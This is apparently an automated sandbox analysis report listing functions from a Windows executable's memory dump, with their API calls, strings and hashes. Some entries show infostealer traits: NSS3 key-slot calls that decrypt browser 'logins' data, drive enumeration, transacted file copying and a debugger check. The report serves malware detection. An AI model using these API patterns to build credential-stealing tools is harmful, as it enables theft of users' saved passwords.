GetLocaleInfoW.KERNEL32(?,2000000B,00460ABB,00000002,00000000,?,?,?,00460ABB,?,00000000), ref: 00460836
GetLocaleInfoW.KERNEL32(?,20001004,00460ABB,00000002,00000000,?,?,?,00460ABB,?,00000000), ref: 0046085F
GetACP.KERNEL32(?,?,00460ABB,?,00000000), ref: 00460874

Strings

ACP, xrefs: 004607BB
OCP, xrefs: 004607F1

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fe37b3f20c298d1294622ac8bc57f3db454fec07df9815b5810f89b62ad7014e
Instruction ID: 5535a66b339d0c0735d2f7c3e4461024f7f5dbd75f38acff56bb2495d76883cb
Opcode Fuzzy Hash: fe37b3f20c298d1294622ac8bc57f3db454fec07df9815b5810f89b62ad7014e
Instruction Fuzzy Hash: 3921C422A00100AADB34EF55CD00B9B73A6FF50B51B168476E90AD7305F73ADD41C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE2C, Relevance: 8.3, Strings: 6, Instructions: 787COMMON

Download Yara Rule

Strings

too many length or distance symbols, xrefs: 0041B5E6
oversubscribed dynamic bit lengths tree, xrefs: 0041B274
incomplete dynamic bit lengths tree, xrefs: 0041B28B
invalid stored block lengths, xrefs: 0041B5D5
invalid block type, xrefs: 0041AEE8
invalid bit length repeat, xrefs: 0041B64E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: incomplete dynamic bit lengths tree$invalid bit length repeat$invalid block type$invalid stored block lengths$oversubscribed dynamic bit lengths tree$too many length or distance symbols
API String ID: 0-2424009833
Opcode ID: 61f6b112659ac0538252c179b1a25ab3234989e85f668851a198f934b0e5eb4a
Instruction ID: 7bf211a364d7e9d3e4ef2acd5f16148c23c59ad1f12efcb7a6db3be1f8de50b5
Opcode Fuzzy Hash: 61f6b112659ac0538252c179b1a25ab3234989e85f668851a198f934b0e5eb4a
Instruction Fuzzy Hash: E862D5B1A00219DFCF04CF69C9916ADBBF1FB48310F24816AD819AB385D738DA91DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00460972, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

Part of subcall function 00454EAB: _free.LIBCMT ref: 00454F0D
Part of subcall function 00454EAB: _free.LIBCMT ref: 00454F43

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00460A7E
IsValidCodePage.KERNEL32(00000000), ref: 00460AC7
IsValidLocale.KERNEL32(?,00000001), ref: 00460AD6
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00460B1E
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00460B3D

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 806d69740db20847278db071fbe2bcd6c70c2d959921b2d95789e6e02add62a4
Instruction ID: c8acc13bcd5d777d510c9f6b87c828905dfcd42873d9e0bb4ebda5eae4ed718f
Opcode Fuzzy Hash: 806d69740db20847278db071fbe2bcd6c70c2d959921b2d95789e6e02add62a4
Instruction Fuzzy Hash: 5E515A72A00309AFEB10DFA5CC45AAF73B8BF54744F14446AE901EB291F7789D448B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041E61E, Relevance: 7.6, APIs: 5, Instructions: 140encryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041E623
_strlen.LIBCMT ref: 0041E690
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,00001FA0,00000000,00000000), ref: 0041E698
PK11_GetInternalKeySlot.NSS3(?,00000000,00000001,?,00001FA0,00000000,00000000,?,logins,logins), ref: 0041E6A6
PK11_FreeSlot.NSS3(?,?,00001FA0,00000000,00000000,?,logins,logins), ref: 0041E77F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: K11_Slot$BinaryCryptFreeH_prologInternalString_strlen
String ID:
API String ID: 1828113442-0
Opcode ID: 22709cf1ce2a017f539b645cc5facfd55867dc3061edd2f0ec0ceb1e9e4641db
Instruction ID: 64678d3632f775c7ff226d62c277aee8c5a07db9f1e5a3d31f7514a0faffff4d
Opcode Fuzzy Hash: 22709cf1ce2a017f539b645cc5facfd55867dc3061edd2f0ec0ceb1e9e4641db
Instruction Fuzzy Hash: 9451F778D042599FDB14DFAA9C909FEFBB8EF09304F10446EE815E3281D7784A45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C315, Relevance: 6.5, Strings: 5, Instructions: 273COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 0041C3EC
need dictionary, xrefs: 0041C617
invalid window size, xrefs: 0041C39E
incorrect data check, xrefs: 0041C51E
unknown compression method, xrefs: 0041C37F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
API String ID: 0-2151277842
Opcode ID: bbce0341be6e972d81982a47dc9b373235e16a91a9359aab5b122e7c2b6c8f47
Instruction ID: 574aba70b65846b389a831acc8dff35c9f657370303b4d869405b9c2461dff73
Opcode Fuzzy Hash: bbce0341be6e972d81982a47dc9b373235e16a91a9359aab5b122e7c2b6c8f47
Instruction Fuzzy Hash: AEB113B1604B10DFD374CF1DD880A62BBF1EB49314B248A5ED4AACB791D739E886CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00460424, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

Part of subcall function 00454EAB: _free.LIBCMT ref: 00454F0D
Part of subcall function 00454EAB: _free.LIBCMT ref: 00454F43

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00460478
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004604C2
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00460588

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 9703389e832315204fc0abe4b98c2f3e5715c9aafd9cb572739126ae3f5b0f29
Instruction ID: e2d94a45479873907bdd2894f131472c2b00e837c8162294b17a35d6ad00bf8a
Opcode Fuzzy Hash: 9703389e832315204fc0abe4b98c2f3e5715c9aafd9cb572739126ae3f5b0f29
Instruction Fuzzy Hash: 1561AE71500207AFEB25DF29CC96BAB77A8EF44304F10406AE906C6285F778DD95CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 004442E1, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0043C5D3), ref: 004443D9
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0043C5D3), ref: 004443E3
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0043C5D3), ref: 004443F0

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 6b8d75ef591d281afeeb8e6bc4462e73cada4439112c3fa310cad87a16db565a
Instruction ID: c879466400c20defbf494ec171e3d162da47b6505e9434d2a219f9d86353b938
Opcode Fuzzy Hash: 6b8d75ef591d281afeeb8e6bc4462e73cada4439112c3fa310cad87a16db565a
Instruction Fuzzy Hash: BB31E4749012289BCB21DF25DC88BCDBBB8BF08714F5041EAE40CA72A1E7749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 0041656D, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 544COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416572

Part of subcall function 00419996: __EH_prolog.LIBCMT ref: 0041999B

Part of subcall function 00432961: GetEnvironmentVariableA.KERNEL32(?,?,00000104,004879A4), ref: 004329AD

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

Part of subcall function 00414A2D: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,?,00000000,?,?,00417C45,?,?,?), ref: 00414A43
Part of subcall function 00414A2D: CopyFileTransactedA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414A69
Part of subcall function 00414A2D: CommitTransaction.KTMW32(00000000,?,00417C45,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00414A74

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

Strings

w, xrefs: 00416728

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$DeallocateTransaction$CommitCopyCreateEnvironmentFileTransactedVariable_strcat
String ID: w
API String ID: 3245203895-4254319369
Opcode ID: 57ac76cf5f5ab7e17519fe1c6bc7db32f469a4aeb3505c2cc1946aad6c31d3c5
Instruction ID: e1d85e34732093a56262cd4771ff13c55506d14dc0713122f7a5b236e5aa85db
Opcode Fuzzy Hash: 57ac76cf5f5ab7e17519fe1c6bc7db32f469a4aeb3505c2cc1946aad6c31d3c5
Instruction Fuzzy Hash: 1C32A070D04268CBDF25EBA5C951BEDBBB1BF18304F10419ED449B7282DB781A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416E0E, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 480COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416E13

Strings

UTC_, xrefs: 00416F98, 004172F9

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: UTC_
API String ID: 3519838083-2527262275
Opcode ID: 109817414e4540f1946fcf473f86ebc3f10eb39ccb6b0315c5818ad67a2a053d
Instruction ID: 7c1b7d33baa1a405ba07fac1be05801e40128f934ea89c8b72b33bf6ce61ce89
Opcode Fuzzy Hash: 109817414e4540f1946fcf473f86ebc3f10eb39ccb6b0315c5818ad67a2a053d
Instruction Fuzzy Hash: F612E330D043589BCF15EBA5CA516EDBBB1BF58304F1041AEE44977292DB781F88CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004602FE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

EnumSystemLocalesW.KERNEL32(00460424,00000001,00000000,?,-00000050,?,00460A52,00000000,?,?,?,00000055,?), ref: 00460370

Strings

RF, xrefs: 00460345

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID: RF
API String ID: 2417226690-4113117155
Opcode ID: 8675804a0a2e96aef4b2d9972239ae8e00a0ab3a2a85c91b0b61e0fd578fae96
Instruction ID: 15dac601e64ab6e4344e9f36ed2afa0a56cf141c9ba50bfe6c0b98a2805e70b2
Opcode Fuzzy Hash: 8675804a0a2e96aef4b2d9972239ae8e00a0ab3a2a85c91b0b61e0fd578fae96
Instruction Fuzzy Hash: 281125362007059FDB289F39C8916BBB7A1FF84359B14442EE98787B40E779A982CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00448140, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ba624b7126ed98bcf470bbd22e648abf626e1b2182e4f806e45dd3d28694a3
Instruction ID: 15747b2a231e0870a28f160b9f6cc4049f177e76beab49e79e52c6a7f99d2fef
Opcode Fuzzy Hash: 68ba624b7126ed98bcf470bbd22e648abf626e1b2182e4f806e45dd3d28694a3
Instruction Fuzzy Hash: B7F13D71E002199FEF14CFA9C9806AEBBB1FF88314F15826ED915A7344DB35AA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004329F2, Relevance: 3.1, APIs: 2, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004329F7
GetLogicalDriveStringsA.KERNEL32 ref: 00432A4E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DriveH_prologLogicalStrings
String ID:
API String ID: 3681778021-0
Opcode ID: 31bf6845f978ac37d767156e7c27fb16dd3d1df065eab6bf507b23a677141138
Instruction ID: e00cbf10d293841f9a8c1a073766b79a4bfdb83d793645b8b8933c7a2511cbff
Opcode Fuzzy Hash: 31bf6845f978ac37d767156e7c27fb16dd3d1df065eab6bf507b23a677141138
Instruction Fuzzy Hash: 0C318B71D0125A9FEB10EFA8D5417EEBFF4AF08314F24406AE544F7381E7B84A448BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0045AC8D, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0045AC88,00000000,?,00000008,?,?,00463D7B,00000000), ref: 0045AEBA

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 353dc3dac9441e6254012cad041a0054548082ffdd37fe5741da5af1182ce75a
Instruction ID: fc9125d20617797fd8c0b0f0c25061915d0922e8b5acf14d3d9b0354fc876a09
Opcode Fuzzy Hash: 353dc3dac9441e6254012cad041a0054548082ffdd37fe5741da5af1182ce75a
Instruction Fuzzy Hash: 72B19E72210604DFD714CF18C486B657BA1FF04366F298659E89ACF3A2C339E9A6CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00460677, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

Part of subcall function 00454EAB: _free.LIBCMT ref: 00454F0D
Part of subcall function 00454EAB: _free.LIBCMT ref: 00454F43

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004606CB

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 2481a7c31555a787dde71b56ab8b1fd0b13f5d0ed52ba10f9b8772d78c510ca0
Instruction ID: 287c91a3423b734b93993b0fb1e6c801281278c85c6db5aefe63e8930c8b8bba
Opcode Fuzzy Hash: 2481a7c31555a787dde71b56ab8b1fd0b13f5d0ed52ba10f9b8772d78c510ca0
Instruction Fuzzy Hash: 05218331515206ABEB289B16DC46ABB77A8EF44315B10007FFD01D6281FB78AD44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004608A3, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00460721,00000000,00000000,?), ref: 004608CF

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 1ded45ef729148539cfebcfbc65f73f1508366a3f960e32c25641f2bda24fdf0
Instruction ID: 71e897dc04de2ecaecef66554a99250bf5302743a50c7ce75510d3fb5ec40c4a
Opcode Fuzzy Hash: 1ded45ef729148539cfebcfbc65f73f1508366a3f960e32c25641f2bda24fdf0
Instruction Fuzzy Hash: 52F0F9725001156BEB285725CC0ABBB7769EB40758F04442EEC17A3281FA78FD45C596

Uniqueness

Uniqueness Score: -1.00%

Function 0046020C, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

Part of subcall function 00454EAB: _free.LIBCMT ref: 00454F0D
Part of subcall function 00454EAB: _free.LIBCMT ref: 00454F43

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00460260

Strings

utf8, xrefs: 004601CF

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID: utf8
API String ID: 2003897158-905460609
Opcode ID: 4528edc005b67de1dbf6f8ace37558069620367296612dccdbce35d4ad36a4cc
Instruction ID: 12e7721651c4dfbdb8b2db3176ad72af5d51b1aae4cf39605791c0a8b780c23b
Opcode Fuzzy Hash: 4528edc005b67de1dbf6f8ace37558069620367296612dccdbce35d4ad36a4cc
Instruction Fuzzy Hash: F6F02D326101059BD714AB35DC5AEBB33A8EF84315F10007EF602DB281EA7CAD058759

Uniqueness

Uniqueness Score: -1.00%

Function 00460399, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

EnumSystemLocalesW.KERNEL32(00460677,00000001,00000000,?,-00000050,?,00460A16,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004603E3

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a51ad4901291cfac1c49110e8cbe15de079ffe7a056c0d8c8ecc95fa3f86c031
Instruction ID: 24fc3fe5ff7203ddd1bced44f8675e8960b83c1ea512845e3040fd9333bd77ae
Opcode Fuzzy Hash: a51ad4901291cfac1c49110e8cbe15de079ffe7a056c0d8c8ecc95fa3f86c031
Instruction Fuzzy Hash: 12F046362003045FCB245F3AD885A7B7B90FF8036CF04402EFD428B780E6B9AC82CA55

Uniqueness

Uniqueness Score: -1.00%

Function 00456257, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 004501D5: EnterCriticalSection.KERNEL32(-0004EC65,?,00451ADB,00000000,00483BD8,0000000C,00451AA2,?,?,00456220,?,?,0045504D,00000001,00000364,00000008), ref: 004501E4

EnumSystemLocalesW.KERNEL32(0045624A,00000001,00483DB8,0000000C,00456729,00000000), ref: 0045628F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 95abdd37efb33c302453fee3bffd51a577af753dcd3a36da393e1aa0ff758adf
Instruction ID: 070ded42e3d4abef9254de8db68445561aa366cd1b251e240cdb694f79c7469f
Opcode Fuzzy Hash: 95abdd37efb33c302453fee3bffd51a577af753dcd3a36da393e1aa0ff758adf
Instruction Fuzzy Hash: AEF04F76A00204EFD700EF98E842B9C77F0EB49726F10456FF8109B2A1C7794904CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004602B3, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

EnumSystemLocalesW.KERNEL32(0046020C,00000001,00000000,?,?,00460A74,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004602EA

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1049e7328732fc230898ba33227c92bee8dca4b22fe946ca9ee473611fbbef02
Instruction ID: f3ed7d754e66195795bcd947d20df484a9ec7f8b918012ce100b7faafba547d7
Opcode Fuzzy Hash: 1049e7328732fc230898ba33227c92bee8dca4b22fe946ca9ee473611fbbef02
Instruction Fuzzy Hash: 3CF0553A3002045BCB049F3AC86D66B7FA0EFC1714B06409AEA068B281E2799C43C759

Uniqueness

Uniqueness Score: -1.00%

Function 00456884, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00453E5D,?,20001004,00000000,00000002,?,?,00453448), ref: 004568B8

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6e2c210601d53546fd4158de5809423171226595ec21c9dea422ac0404ce70e9
Instruction ID: 50fb04f8e73cf5082bd722347db0a38f6c1ba0c46fe3a803b2a75abc89f6a9aa
Opcode Fuzzy Hash: 6e2c210601d53546fd4158de5809423171226595ec21c9dea422ac0404ce70e9
Instruction Fuzzy Hash: 26E04F31501528BFCF122F61DC05E9E3F1AFF44762F454026FD0566222DB7A8D31AA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043E1E9, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0003E1F5,0043DAF6), ref: 0043E1EE

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 819bb86ad62ed58dc38ee9ed6604b9d293ee525ba67ebaab8f29cdd5fa1339d8
Instruction ID: 137c3802b2ce1c0affc3c6bc221d39a0f75ad5e85bef9e0ee21b4864ad614940
Opcode Fuzzy Hash: 819bb86ad62ed58dc38ee9ed6604b9d293ee525ba67ebaab8f29cdd5fa1339d8
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0044AF58, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 0044B0D4

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 6110ed094788a03bd00b028201ecb7778e6cc26b3a57c92fee3c47d93b634752
Instruction ID: 80a4cd5a38b622aa20c3326d4f12b30199b6a01938928900152cb2c47c2f4bca
Opcode Fuzzy Hash: 6110ed094788a03bd00b028201ecb7778e6cc26b3a57c92fee3c47d93b634752
Instruction Fuzzy Hash: 03517AB0240A485AFB38892888957BF7799DB45305F18051FE492D7382C75EDD4E93DF

Uniqueness

Uniqueness Score: -1.00%

Function 004400D5, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 706e92b95e4420c8ade8f61073429952f34ced34eb103d1662f367673f8d1d83
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 109175322080A34AFB29463A853903FFFE15A513A171A079FD9F2CB2D1ED78C974D624

Uniqueness

Uniqueness Score: -1.00%

Function 00440390, Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: dbc1591166b9c18016c2ed0c0520792b61c779ec62c26e35fc2e140ff434bc5c
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 549178721090A34AF769863A857403FFFE15A913A171A079FD5F2CB2C5EE38C574EA24

Uniqueness

Uniqueness Score: -1.00%

Function 0044617A, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be8d897f5e785d2b62fc7bbd919bb430dba44fb2abac28524605ee71a5fae29a
Instruction ID: 56530d9409c4b02b0c387c2b9f253fa40b1a15b1e22c81b6eea718043ef132ec
Opcode Fuzzy Hash: be8d897f5e785d2b62fc7bbd919bb430dba44fb2abac28524605ee71a5fae29a
Instruction Fuzzy Hash: 54518371E00119AFEF04CF99C990AAEBBB2FF89304F19809DE805AB341D7359E51CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00458259, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bb172ce001702cbae715284c9e339cb8c26e3d36247048699c13b5ef8f54ff9
Instruction ID: 7853ab8a16e6d7772a1113742f01b0761f848c163879d1e1dc0e88363548a472
Opcode Fuzzy Hash: 0bb172ce001702cbae715284c9e339cb8c26e3d36247048699c13b5ef8f54ff9
Instruction Fuzzy Hash: B421B673F2053947770CC47E8C5627DB6E1C68C501745823EE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00458139, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5b8d276a371b64a7c76a5d1bae022ad8b91c8e5ac9259a771730c26e4159da
Instruction ID: f88d3a13fc943dae0ac7bc068bdb74731fbbf841148fc8bb44c83deaec5b8191
Opcode Fuzzy Hash: 6e5b8d276a371b64a7c76a5d1bae022ad8b91c8e5ac9259a771730c26e4159da
Instruction Fuzzy Hash: E9117723F30C255B775C816D8C172BA95D2DBD825070F533ED826E7284E994DE13D390

Uniqueness

Uniqueness Score: -1.00%

Function 00440AC0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
